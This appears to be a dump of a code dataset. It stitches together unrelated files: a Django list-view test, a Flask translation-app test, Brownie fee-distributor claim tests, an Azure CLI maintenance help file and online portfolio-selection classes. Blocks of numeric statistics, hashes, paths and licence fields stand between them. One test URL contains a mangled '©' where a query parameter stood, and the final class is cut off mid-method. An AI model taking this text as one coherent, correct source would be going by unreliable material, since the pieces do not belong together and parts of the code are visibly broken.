url = reverse("staff-list")+"?sEcho=19&iColumns=8&sColumns=&iDisplayStart=0&iDisplayLength=10&mDataProp_0=0&mDataProp_1=1&mDataProp_2=2&mDataProp_3=3&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&mDataProp_7=7&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&sSearch_3=&bRegex_3=false&bSearchable_3=true&sSearch_4={search_term}&bRegex_4=false&bSearchable_4=true&sSearch_5=&bRegex_5=false&bSearchable_5=true&sSearch_6=&bRegex_6=false&bSearchable_6=true&sSearch_7=&bRegex_7=false&bSearchable_7=true&iSortingCols=1&iSortCol_0=1&sSortDir_0=asc&bSortable_0=true&bSortable_1=true&bSortable_2=true&bSortable_3=true&bSortable_4=true&bSortable_5=true&bSortable_6=true&bSortable_7=true&sRangeSeparator=~&_=1414439607645".format(search_term=search_term)
response = client.get(url, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
payload = json.loads(response.content.decode('utf-8'))
data = payload.pop("aaData")
staff = Staff.objects.filter(position__name=search_term).order_by('last_name', "first_name")[:lisettings.LISTABLE_PAGINATE_BY]
names = [s.name() for s in staff]
payload_names = [x[1] for x in data]
self.assertListEqual(names, payload_names)
| 79.946429
| 1,066
| 0.77202
| 2,041
| 13,431
| 4.810877
| 0.096521
| 0.122212
| 0.017313
| 0.018332
| 0.829209
| 0.818923
| 0.799674
| 0.784194
| 0.778694
| 0.755474
| 0
| 0.06011
| 0.094557
| 13,431
| 167
| 1,067
| 80.42515
| 0.747307
| 0.081975
| 0
| 0.431193
| 0
| 0.073395
| 0.584262
| 0.540321
| 0
| 0
| 0
| 0
| 0.12844
| 1
| 0.091743
| false
| 0
| 0.091743
| 0
| 0.201835
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5e490f08f171419a6bd5454e0daa2b5af13e5ad1
| 3,549
|
py
|
Python
|
April/mariantranslation/test_app.py
|
adomaatobrah/simplewebpage
|
41b3d78d03d15d7aaac5dda1a592c7e850bb70d2
|
[
"MIT"
] | null | null | null |
April/mariantranslation/test_app.py
|
adomaatobrah/simplewebpage
|
41b3d78d03d15d7aaac5dda1a592c7e850bb70d2
|
[
"MIT"
] | null | null | null |
April/mariantranslation/test_app.py
|
adomaatobrah/simplewebpage
|
41b3d78d03d15d7aaac5dda1a592c7e850bb70d2
|
[
"MIT"
] | null | null | null |
import app
def test_completion():
result_should_be ={'expected': ' It was a dark and stormy night.', 'newEnglish': ' The night was dark and stormy.', 'predictions': [['\xa0', '\xa0It', '\xa0"', '\xa0-', '\xa0*', '\xa0♫', '\xa0it', '\xa0The', '\xa0A', '\xa0This'], ['\xa0night', '\xa0evening', '\xa0day', '\xa0nights', '\xa0darkness', '\xa0dark', '\xa0time', '\xa0whole', '\xa0Night', '\xa0place'], ['\xa0was', '\xa0is', '\xa0had', '\xa0of', ',', '\xa0it', '\xa0came', '\xa0in', '\xa0has', '\xa0I'], ['\xa0dark', '\xa0a', '\xa0black', '\xa0so', '\xa0darkness', '\xa0both', '\xa0night', '\xa0deep', '\xa0', '\xa0long'], ['\xa0and', ',', '.', '...', 'er', '\xa0with', '\xa0or', ';', '\xa0in', 'est'], ['\xa0storm', '\xa0temp', '\xa0thunder', '\xa0a', '\xa0rainy', '\xa0heavy', '\xa0has', '\xa0severe', '\xa0', '\xa0was'], ['y', 'ful', '.', 'ous', 'ily', 'ier', 'ly', 'ing', 'iness', 'some'], ['.', '</s>', ',', '!', ';', '\xa0and', '...', ':', '."', '\xa0'], ['</s>', '\xa0"', '\xa0—', "\xa0'", '\xa0It', '\xa0I', '\xa0-', '\xa0', '.', '...']], 'score': -0.801, 'tokens': ['\xa0The', '\xa0night', '\xa0was', '\xa0dark', '\xa0and', '\xa0storm', 'y', '.', '</s>'], 'translation': ' The night was dark and stormy.'}
with app.app.test_client() as client:
response = client.get('/result?english=It+was+a+dark+and+stormy+night.&start=+The+night&skip=true©=false')
print(response.get_json())
assert response.get_json() == result_should_be
print("passed")
def test_alternatives():
result_should_be = {
"alternatives": [
" The night was dark and stormy.",
" And it was a dark and stormy night.",
" A dark and stormy night.",
" Dark and stormy night."
]}
with app.app.test_client() as client:
response = client.get('/rearrange?english=It+was+a+dark+and+stormy+night.&start=&auto=true')
print(response.get_json())
assert response.get_json() == result_should_be
print("passed")
def test_reorder():
result_should_be = {'expected': ' It was a dark and stormy night.', 'newEnglish': ' The night was dark and stormy.', 'predictions': [['\xa0', '\xa0It', '\xa0"', '\xa0-', '\xa0*', '\xa0♫', '\xa0it', '\xa0The', '\xa0A', '\xa0This'], ['\xa0night', '\xa0evening', '\xa0day', '\xa0nights', '\xa0darkness', '\xa0dark', '\xa0time', '\xa0whole', '\xa0Night', '\xa0place'], ['\xa0was', '\xa0is', '\xa0had', '\xa0of', ',', '\xa0it', '\xa0came', '\xa0in', '\xa0has', '\xa0I'], ['\xa0dark', '\xa0a', '\xa0black', '\xa0so', '\xa0darkness', '\xa0both', '\xa0night', '\xa0deep', '\xa0', '\xa0long'], ['\xa0and', ',', '.', '...', 'er', '\xa0with', '\xa0or', ';', '\xa0in', 'est'], ['\xa0storm', '\xa0temp', '\xa0thunder', '\xa0a', '\xa0rainy', '\xa0heavy', '\xa0has', '\xa0severe', '\xa0', '\xa0was'], ['y', 'ful', '.', 'ous', 'ily', 'ier', 'ly', 'ing', 'iness', 'some'], ['.', '</s>', ',', '!', ';', '\xa0and', '...', ':', '."', '\xa0'], ['</s>', '\xa0"', '\xa0—', "\xa0'", '\xa0It', '\xa0I', '\xa0-', '\xa0', '.', '...']], 'score': -0.801, 'tokens': ['\xa0The', '\xa0night', '\xa0was', '\xa0dark', '\xa0and', '\xa0storm', 'y', '.', '</s>'], 'translation': ' The night was dark and stormy.'}
with app.app.test_client() as client:
response = client.get('/rearrange?english=+It+was+a+dark+and+stormy+night.&start=%C2%A0night&auto=false')
print(response.get_json())
assert response.get_json() == result_should_be
print("passed")
test_completion()
test_alternatives()
test_reorder()
| 91
| 1,180
| 0.541843
| 385
| 3,549
| 4.935065
| 0.246753
| 0.047895
| 0.088947
| 0.075789
| 0.905263
| 0.895263
| 0.882632
| 0.87
| 0.87
| 0.851053
| 0
| 0.048521
| 0.152156
| 3,549
| 38
| 1,181
| 93.394737
| 0.581589
| 0
| 0
| 0.451613
| 0
| 0.096774
| 0.498027
| 0.065389
| 0
| 0
| 0
| 0
| 0.096774
| 1
| 0.096774
| false
| 0.096774
| 0.032258
| 0
| 0.129032
| 0.193548
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
5e967d54e5ca18686095819db28a9e09a1451c1c
| 143
|
py
|
Python
|
yah/_http/defaults.py
|
sunsx0/yah
|
c073015dfa1fb2b5232c3ec4a9b9dbae571f7053
|
[
"MIT"
] | null | null | null |
yah/_http/defaults.py
|
sunsx0/yah
|
c073015dfa1fb2b5232c3ec4a9b9dbae571f7053
|
[
"MIT"
] | null | null | null |
yah/_http/defaults.py
|
sunsx0/yah
|
c073015dfa1fb2b5232c3ec4a9b9dbae571f7053
|
[
"MIT"
] | null | null | null |
from .aio_http import AioHttpRequestMaker
from .client import Client
def create_client() -> Client:
return Client(AioHttpRequestMaker())
| 20.428571
| 41
| 0.783217
| 16
| 143
| 6.875
| 0.5625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.13986
| 143
| 6
| 42
| 23.833333
| 0.894309
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
5ed4700b114e2adc71717dccfab50b4ac7087ebd
| 3,317
|
py
|
Python
|
tests/unitary/FeeDistributor/test_claim_many.py
|
ribbon-finance/ribbonomics
|
fb0034137aa8c0dfdd5e25c193b11a9e0099b78b
|
[
"MIT"
] | 2
|
2022-01-13T21:11:30.000Z
|
2022-03-10T08:20:42.000Z
|
tests/unitary/FeeDistributor/test_claim_many.py
|
ribbon-finance/ribbonomics
|
fb0034137aa8c0dfdd5e25c193b11a9e0099b78b
|
[
"MIT"
] | null | null | null |
tests/unitary/FeeDistributor/test_claim_many.py
|
ribbon-finance/ribbonomics
|
fb0034137aa8c0dfdd5e25c193b11a9e0099b78b
|
[
"MIT"
] | 2
|
2022-01-30T20:54:55.000Z
|
2022-03-05T17:49:19.000Z
|
from brownie import ZERO_ADDRESS
WEEK = 86400 * 7
def test_claim_many(alice, bob, charlie, accounts, chain, voting_escrow, ve_rbn_rewards, fee_distributor, weth, token):
amount = 1000 * 10 ** 18
for acct in (alice, bob, charlie):
token.approve(voting_escrow, amount * 10, {"from": acct})
token.transfer(acct, amount, {"from": alice})
voting_escrow.create_lock(amount, chain.time() + 8 * WEEK, {"from": acct})
chain.sleep(WEEK)
chain.mine()
start_time = int(chain.time())
chain.sleep(WEEK * 5)
fee_distributor = fee_distributor(t=start_time)
accounts[3].transfer(fee_distributor, "10 ether")
fee_distributor.checkpoint_token()
chain.sleep(WEEK)
fee_distributor.checkpoint_token()
fee_distributor.claim_many([alice, bob, charlie] + [ZERO_ADDRESS] * 17, {"from": alice})
balances = [i.balance() for i in (alice, bob, charlie)]
chain.undo()
fee_distributor.claim({"from": alice})
fee_distributor.claim({"from": bob})
fee_distributor.claim({"from": charlie})
assert balances == [i.balance() for i in (alice, bob, charlie)]
def test_claim_many_with_burn(alice, bob, charlie, accounts, chain, voting_escrow, ve_rbn_rewards, fee_distributor, weth, token):
amount = 1000 * 10 ** 18
for acct in (alice, bob, charlie):
token.approve(voting_escrow, amount * 10, {"from": acct})
token.transfer(acct, amount, {"from": alice})
voting_escrow.create_lock(amount, chain.time() + 8 * WEEK, {"from": acct})
chain.sleep(WEEK)
chain.mine()
start_time = int(chain.time())
chain.sleep(WEEK * 5)
fee_distributor = fee_distributor(t=start_time)
weth.deposit({"from": accounts[3], "value": 10 * 10 ** 18})
weth.approve(fee_distributor, 10 * 10 ** 18, {"from": accounts[3]})
fee_distributor.burn(weth, 10 * 10 ** 18, {"from": accounts[3]})
assert fee_distributor.balance() == 10 * 10 ** 18
fee_distributor.checkpoint_token()
chain.sleep(WEEK)
fee_distributor.checkpoint_token()
fee_distributor.claim_many([alice, bob, charlie] + [ZERO_ADDRESS] * 17, {"from": alice})
balances = [i.balance() for i in (alice, bob, charlie)]
chain.undo()
fee_distributor.claim({"from": alice})
fee_distributor.claim({"from": bob})
fee_distributor.claim({"from": charlie})
assert balances == [i.balance() for i in (alice, bob, charlie)]
def test_claim_many_same_account(
alice, bob, charlie, accounts, chain, voting_escrow, ve_rbn_rewards, fee_distributor, weth, token
):
amount = 1000 * 10 ** 18
for acct in (alice, bob, charlie):
token.approve(voting_escrow, amount * 10, {"from": acct})
token.transfer(acct, amount, {"from": alice})
voting_escrow.create_lock(amount, chain.time() + 8 * WEEK, {"from": acct})
chain.sleep(WEEK)
chain.mine()
start_time = int(chain.time())
chain.sleep(WEEK * 5)
fee_distributor = fee_distributor(t=start_time)
accounts[3].transfer(fee_distributor, "10 ether")
fee_distributor.checkpoint_token()
chain.sleep(WEEK)
fee_distributor.checkpoint_token()
expected = fee_distributor.claim.call({"from": alice}) + alice.balance()
fee_distributor.claim_many([alice] * 20, {"from": alice})
assert alice.balance() == expected
| 34.552083
| 129
| 0.664757
| 434
| 3,317
| 4.90553
| 0.145161
| 0.197276
| 0.084547
| 0.055895
| 0.874119
| 0.85674
| 0.838892
| 0.838892
| 0.838892
| 0.838892
| 0
| 0.030033
| 0.186916
| 3,317
| 95
| 130
| 34.915789
| 0.759362
| 0
| 0
| 0.797101
| 0
| 0
| 0.032861
| 0
| 0
| 0
| 0
| 0
| 0.057971
| 1
| 0.043478
| false
| 0
| 0.014493
| 0
| 0.057971
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d6b495fd8ebea52a3588660151f8a20c01b89c7
| 14,962
|
py
|
Python
|
src/maintenance/azext_maintenance/generated/_help.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 207
|
2017-11-29T06:59:41.000Z
|
2022-03-31T10:00:53.000Z
|
src/maintenance/azext_maintenance/generated/_help.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 4,061
|
2017-10-27T23:19:56.000Z
|
2022-03-31T23:18:30.000Z
|
src/maintenance/azext_maintenance/generated/_help.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 802
|
2017-10-11T17:36:26.000Z
|
2022-03-31T22:24:32.000Z
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from knack.help_files import helps
helps['maintenance'] = '''
type: group
short-summary: Manage Maintenance
'''
helps['maintenance public-configuration'] = """
type: group
short-summary: Manage public maintenance configuration with maintenance
"""
helps['maintenance public-configuration list'] = """
type: command
short-summary: "Get Public Maintenance Configuration records."
examples:
- name: PublicMaintenanceConfigurations_List
text: |-
az maintenance public-configuration list
"""
helps['maintenance public-configuration show'] = """
type: command
short-summary: "Get Public Maintenance Configuration record."
examples:
- name: PublicMaintenanceConfigurations_GetForResource
text: |-
az maintenance public-configuration show --resource-name "configuration1"
"""
helps['maintenance applyupdate'] = """
type: group
short-summary: Manage apply update with maintenance
"""
helps['maintenance applyupdate list'] = """
type: command
short-summary: "Get Configuration records within a subscription."
examples:
- name: ApplyUpdates_List
text: |-
az maintenance applyupdate list
"""
helps['maintenance applyupdate show'] = """
type: command
short-summary: "Track maintenance updates to resource."
examples:
- name: ApplyUpdates_Get
text: |-
az maintenance applyupdate show --name "e9b9685d-78e4-44c4-a81c-64a14f9b87b6" --provider-name \
"Microsoft.Compute" --resource-group "examplerg" --resource-name "smdtest1" --resource-type "virtualMachineScaleSets"
"""
helps['maintenance applyupdate create'] = """
type: command
short-summary: "Apply maintenance updates to resource."
examples:
- name: ApplyUpdates_CreateOrUpdate
text: |-
az maintenance applyupdate create --provider-name "Microsoft.Compute" --resource-group "examplerg" \
--resource-name "smdtest1" --resource-type "virtualMachineScaleSets"
"""
helps['maintenance applyupdate update'] = """
type: command
short-summary: "Apply maintenance updates to resource."
"""
helps['maintenance applyupdate create-or-update-parent'] = """
type: command
short-summary: "Apply maintenance updates to resource with parent."
examples:
- name: ApplyUpdates_CreateOrUpdateParent
text: |-
az maintenance applyupdate create-or-update-parent --provider-name "Microsoft.Compute" --resource-group \
"examplerg" --resource-name "smdvm1" --resource-parent-name "smdtest1" --resource-parent-type \
"virtualMachineScaleSets" --resource-type "virtualMachines"
"""
helps['maintenance applyupdate show-parent'] = """
type: command
short-summary: "Track maintenance updates to resource with parent."
examples:
- name: ApplyUpdates_GetParent
text: |-
az maintenance applyupdate show-parent --name "e9b9685d-78e4-44c4-a81c-64a14f9b87b6" --provider-name \
"Microsoft.Compute" --resource-group "examplerg" --resource-name "smdvm1" --resource-parent-name "smdtest1" \
--resource-parent-type "virtualMachineScaleSets" --resource-type "virtualMachines"
"""
helps['maintenance applyupdate get-parent'] = """
type: command
short-summary: "Track maintenance updates to resource with parent."
examples:
- name: ApplyUpdates_GetParent
text: |-
az maintenance applyupdate get-parent --name "e9b9685d-78e4-44c4-a81c-64a14f9b87b6" --provider-name \
"Microsoft.Compute" --resource-group "examplerg" --resource-name "smdvm1" --resource-parent-name "smdtest1" \
--resource-parent-type "virtualMachineScaleSets" --resource-type "virtualMachines"
"""
helps['maintenance assignment'] = """
type: group
short-summary: Manage configuration assignment with maintenance
"""
helps['maintenance assignment list'] = """
type: command
short-summary: "List configurationAssignments for resource."
examples:
- name: ConfigurationAssignments_List
text: |-
az maintenance assignment list --provider-name "Microsoft.Compute" --resource-group "examplerg" \
--resource-name "smdtest1" --resource-type "virtualMachineScaleSets"
"""
helps['maintenance assignment show'] = """
type: command
short-summary: "Get configuration for resource."
examples:
- name: ConfigurationAssignments_Get
text: |-
az maintenance assignment show --name "workervmConfiguration" --provider-name "Microsoft.Compute" \
--resource-group "examplerg" --resource-name "smdtest1" --resource-type "virtualMachineScaleSets"
"""
helps['maintenance assignment create'] = """
type: command
short-summary: "Register configuration for resource."
examples:
- name: ConfigurationAssignments_CreateOrUpdate
text: |-
az maintenance assignment create --maintenance-configuration-id "/subscriptions/5b4b650e-28b9-4790-b3ab-\
ddbd88d727c4/resourcegroups/examplerg/providers/Microsoft.Maintenance/maintenanceConfigurations/configuration1" --name \
"workervmConfiguration" --provider-name "Microsoft.Compute" --resource-group "examplerg" --resource-name "smdtest1" \
--resource-type "virtualMachineScaleSets"
"""
helps['maintenance assignment update'] = """
type: command
short-summary: "Register configuration for resource."
"""
helps['maintenance assignment delete'] = """
type: command
short-summary: "Unregister configuration for resource."
examples:
- name: ConfigurationAssignments_Delete
text: |-
az maintenance assignment delete --name "workervmConfiguration" --provider-name "Microsoft.Compute" \
--resource-group "examplerg" --resource-name "smdtest1" --resource-type "virtualMachineScaleSets"
"""
helps['maintenance assignment create-or-update-parent'] = """
type: command
short-summary: "Register configuration for resource."
examples:
- name: ConfigurationAssignments_CreateOrUpdateParent
text: |-
az maintenance assignment create-or-update-parent --maintenance-configuration-id \
"/subscriptions/5b4b650e-28b9-4790-b3ab-ddbd88d727c4/resourcegroups/examplerg/providers/Microsoft.Maintenance/maintenan\
ceConfigurations/policy1" --name "workervmPolicy" --provider-name "Microsoft.Compute" --resource-group "examplerg" \
--resource-name "smdvm1" --resource-parent-name "smdtest1" --resource-parent-type "virtualMachineScaleSets" \
--resource-type "virtualMachines"
"""
helps['maintenance assignment delete-parent'] = """
type: command
short-summary: "Unregister configuration for resource."
examples:
- name: ConfigurationAssignments_DeleteParent
text: |-
az maintenance assignment delete-parent --name "workervmConfiguration" --provider-name \
"Microsoft.Compute" --resource-group "examplerg" --resource-name "smdvm1" --resource-parent-name "smdtest1" \
--resource-parent-type "virtualMachineScaleSets" --resource-type "virtualMachines"
"""
helps['maintenance assignment list-parent'] = """
type: command
short-summary: "List configurationAssignments for resource."
examples:
- name: ConfigurationAssignments_ListParent
text: |-
az maintenance assignment list-parent --provider-name "Microsoft.Compute" --resource-group "examplerg" \
--resource-name "smdtestvm1" --resource-parent-name "smdtest1" --resource-parent-type "virtualMachineScaleSets" \
--resource-type "virtualMachines"
"""
helps['maintenance assignment show-parent'] = """
type: command
short-summary: "Get configuration for resource."
examples:
- name: ConfigurationAssignments_GetParent
text: |-
az maintenance assignment show-parent --name "workervmPolicy" --provider-name "Microsoft.Compute" \
--resource-group "examplerg" --resource-name "smdvm1" --resource-parent-name "smdtest1" --resource-parent-type \
"virtualMachineScaleSets" --resource-type "virtualMachines"
"""
helps['maintenance configuration'] = """
type: group
short-summary: Manage maintenance configuration with maintenance
"""
helps['maintenance configuration list'] = """
type: command
short-summary: "Get Configuration records within a subscription."
examples:
- name: MaintenanceConfigurations_List
text: |-
az maintenance configuration list
"""
helps['maintenance configuration show'] = """
type: command
short-summary: "Get Configuration record."
examples:
- name: MaintenanceConfigurations_GetForResource
text: |-
az maintenance configuration show --resource-group "examplerg" --resource-name "configuration1"
- name: MaintenanceConfigurations_GetForResource_GuestOSPatchLinux
text: |-
az maintenance configuration show --resource-group "examplerg" --resource-name "configuration1"
- name: MaintenanceConfigurations_GetForResource_GuestOSPatchWindows
text: |-
az maintenance configuration show --resource-group "examplerg" --resource-name "configuration1"
"""
helps['maintenance configuration create'] = """
type: command
short-summary: "Create configuration record."
parameters:
- name: --install-patches-windows-parameters --windows-parameters
short-summary: "Input parameters specific to patching a Windows machine. For Linux machines, do not pass this \
property."
long-summary: |
Usage: --install-patches-windows-parameters kb-numbers-to-exclude=XX kb-numbers-to-include=XX \
classifications-to-include=XX exclude-kbs-requiring-reboot=XX
kb-numbers-to-exclude: Windows KBID to be excluded for patching.
kb-numbers-to-include: Windows KBID to be included for patching.
classifications-to-include: Classification category of patches to be patched
exclude-kbs-requiring-reboot: Exclude patches which need reboot
- name: --install-patches-linux-parameters --linux-parameters
short-summary: "Input parameters specific to patching Linux machine. For Windows machines, do not pass this \
property."
long-summary: |
Usage: --install-patches-linux-parameters package-name-masks-to-exclude=XX package-name-masks-to-include=XX\
classifications-to-include=XX
package-name-masks-to-exclude: Package names to be excluded for patching.
package-name-masks-to-include: Package names to be included for patching.
classifications-to-include: Classification category of patches to be patched
examples:
- name: MaintenanceConfigurations_CreateOrUpdateForResource
text: |-
az maintenance configuration create --location "westus2" --maintenance-scope "OSImage" \
--maintenance-window-duration "05:00" --maintenance-window-expiration-date-time "9999-12-31 00:00" \
--maintenance-window-recur-every "Day" --maintenance-window-start-date-time "2020-04-30 08:00" \
--maintenance-window-time-zone "Pacific Standard Time" --namespace "Microsoft.Maintenance" --visibility "Custom" \
--resource-group "examplerg" --resource-name "configuration1"
"""
helps['maintenance configuration update'] = """
type: command
short-summary: "Patch configuration record."
parameters:
- name: --install-patches-windows-parameters --windows-parameters
short-summary: "Input parameters specific to patching a Windows machine. For Linux machines, do not pass this \
property."
long-summary: |
Usage: --install-patches-windows-parameters kb-numbers-to-exclude=XX kb-numbers-to-include=XX \
classifications-to-include=XX exclude-kbs-requiring-reboot=XX
kb-numbers-to-exclude: Windows KBID to be excluded for patching.
kb-numbers-to-include: Windows KBID to be included for patching.
classifications-to-include: Classification category of patches to be patched
exclude-kbs-requiring-reboot: Exclude patches which need reboot
- name: --install-patches-linux-parameters --linux-parameters
short-summary: "Input parameters specific to patching Linux machine. For Windows machines, do not pass this \
property."
long-summary: |
Usage: --install-patches-linux-parameters package-name-masks-to-exclude=XX package-name-masks-to-include=XX\
classifications-to-include=XX
package-name-masks-to-exclude: Package names to be excluded for patching.
package-name-masks-to-include: Package names to be included for patching.
classifications-to-include: Classification category of patches to be patched
examples:
- name: MaintenanceConfigurations_UpdateForResource
text: |-
az maintenance configuration update --location "westus2" --maintenance-scope "OSImage" \
--maintenance-window-duration "05:00" --maintenance-window-expiration-date-time "9999-12-31 00:00" \
--maintenance-window-recur-every "Month Third Sunday" --maintenance-window-start-date-time "2020-04-30 08:00" \
--maintenance-window-time-zone "Pacific Standard Time" --namespace "Microsoft.Maintenance" --visibility "Custom" \
--resource-group "examplerg" --resource-name "configuration1"
"""
helps['maintenance configuration delete'] = """
type: command
short-summary: "Delete Configuration record."
examples:
- name: MaintenanceConfigurations_DeleteForResource
text: |-
az maintenance configuration delete --resource-group "examplerg" --resource-name "example1"
"""
helps['maintenance update'] = """
type: group
short-summary: Manage update with maintenance
"""
helps['maintenance update list'] = """
type: command
short-summary: "Get updates to resources."
examples:
- name: Updates_List
text: |-
az maintenance update list --provider-name "Microsoft.Compute" --resource-group "examplerg" \
--resource-name "smdtest1" --resource-type "virtualMachineScaleSets"
"""
helps['maintenance update list-parent'] = """
type: command
short-summary: "Get updates to resources."
examples:
- name: Updates_ListParent
text: |-
az maintenance update list-parent --provider-name "Microsoft.Compute" --resource-group "examplerg" \
--resource-name "1" --resource-parent-name "smdtest1" --resource-parent-type "virtualMachineScaleSets" --resource-type \
"virtualMachines"
"""
| 43.242775
| 120
| 0.701912
| 1,496
| 14,962
| 7.001337
| 0.13369
| 0.040099
| 0.03819
| 0.054898
| 0.879225
| 0.793489
| 0.75864
| 0.743842
| 0.724652
| 0.69725
| 0
| 0.01551
| 0.176915
| 14,962
| 345
| 121
| 43.368116
| 0.834998
| 0.031413
| 0
| 0.644295
| 0
| 0.130872
| 0.95394
| 0.252676
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.013423
| 0.003356
| 0
| 0.003356
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
21939c5323036a090c0bed78e9613687de8d3945
| 12,048
|
py
|
Python
|
online_classes.py
|
charlessutton/OLMAR
|
fb9e95083d4d7d568708d3025e2f23fd32271468
|
[
"MIT"
] | 8
|
2016-12-04T15:42:43.000Z
|
2021-06-17T19:20:53.000Z
|
online_classes.py
|
charlessutton/OLMAR
|
fb9e95083d4d7d568708d3025e2f23fd32271468
|
[
"MIT"
] | null | null | null |
online_classes.py
|
charlessutton/OLMAR
|
fb9e95083d4d7d568708d3025e2f23fd32271468
|
[
"MIT"
] | 6
|
2018-09-12T12:06:27.000Z
|
2021-10-12T20:59:39.000Z
|
from universal.algo import Algo
from universal import tools
import numpy as np
class OLRANDOM(Algo):
PRICE_TYPE = 'raw'
REPLACE_MISSING = True
def __init__(self, window=5, eps=10):
"""
:param window: Lookback window.
:param eps: Constraint on return for new weights on last price (average of prices).
x * w >= eps for new weights w.
"""
super(OLRANDOM, self).__init__(min_history=window)
# input check
if window < 2:
raise ValueError('window parameter must be >=3')
if eps < 1:
raise ValueError('epsilon parameter must be >=1')
self.window = window
self.eps = eps
def init_weights(self, m):
return np.ones(m) / m
def step(self, x, last_b, history):
# calculate return prediction
x_pred = self.predict(x, history.iloc[-self.window:])
b = self.update(last_b, x_pred, self.eps)
return b
def predict(self, x, history):
""" Predict returns on next day, selecting returns randomly among the last days in the window
THIS IS OUR MAIN MODIFICATION
if self.each_share :
x_pred = np.ones(history.shape[1])
for i in range(history.shape[1]): # for each share
x_pred[i] = np.asanyarray(history[[i]].sample(random_state = 123456))
x_pred = x_pred.reshape((history.shape[1]))
else :
x_pred = np.asanyarray(history.sample(random_state = 123456)).reshape((history.shape[1]))
"""
x_pred = np.asanyarray(history.sample(random_state = 123456)).reshape((history.shape[1]))
return x_pred
def update(self, b, x, eps):
""" Update portfolio weights to satisfy constraint b * x >= eps
and minimize distance to previous weights. """
x_mean = np.mean(x)
lam = max(0., (eps - np.dot(b, x)) / np.linalg.norm(x - x_mean)**2)
# limit lambda to avoid numerical problems
lam = min(100000, lam)
# update portfolio
b = b + lam * (x - x_mean)
# project it onto simplex
return tools.simplex_proj(b)
class OLGAUSS(Algo):
PRICE_TYPE = 'raw'
REPLACE_MISSING = True
def __init__(self, window=5, eps=10, mu = 1, sigma = 0.01 ):
"""
:param window: Lookback window.
:param eps: Constraint on return for new weights on last price (average of prices).
x * w >= eps for new weights w.
"""
super(OLGAUSS, self).__init__(min_history=window)
# input check
if window < 2:
raise ValueError('window parameter must be >=3')
if eps < 1:
raise ValueError('epsilon parameter must be >=1')
self.window = window
self.eps = eps
self.mu = mu
self.sigma = sigma
def init_weights(self, m):
return np.ones(m) / m
def step(self, x, last_b, history):
# calculate return prediction
x_pred = self.predict(x, history.iloc[-self.window:])
b = self.update(last_b, x_pred, self.eps)
return b
def predict(self, x, history):
""" Predict the price relatives of the next day.
The prediction is a vector of gaussian centered in 1
THIS IS OUR MAIN MODIFICATION
"""
np.random.seed(123456)
x_pred = np.random.normal(self.mu, self.sigma, history.shape[1]).reshape((history.shape[1]))
return x_pred
def update(self, b, x, eps):
""" Update portfolio weights to satisfy constraint b * x >= eps
and minimize distance to previous weights. """
x_mean = np.mean(x)
lam = max(0., (eps - np.dot(b, x)) / np.linalg.norm(x - x_mean)**2)
# limit lambda to avoid numerical problems
lam = min(100000, lam)
# update portfolio
b = b + lam * (x - x_mean)
# project it onto simplex
return tools.simplex_proj(b)
class OLEWM(Algo):
PRICE_TYPE = 'raw'
REPLACE_MISSING = True
def __init__(self, window=5, eps=10, alpha=0.6):
"""
:param window: Lookback window.
:param eps: Constraint on return for new weights on last price (average of prices).
x * w >= eps for new weights w.
"""
super(OLEWM, self).__init__(min_history=window)
# input check
if window < 2:
raise ValueError('window parameter must be >=3')
if eps < 1:
raise ValueError('epsilon parameter must be >=1')
self.window = window
self.eps = eps
self.alpha = alpha
def init_weights(self, m):
return np.ones(m) / m
def step(self, x, last_b, history):
# calculate return prediction
x_pred = self.predict(x, history.iloc[-self.window:])
b = self.update(last_b, x_pred, self.eps)
return b
def predict(self, x, history):
""" Predict returns on next day.
THIS IS OUR MAIN MODIFICATION
"""
x_pred = np.asarray(history.ewm(alpha=self.alpha).mean().iloc()[-1]).reshape(history.shape[1])
return x_pred / x
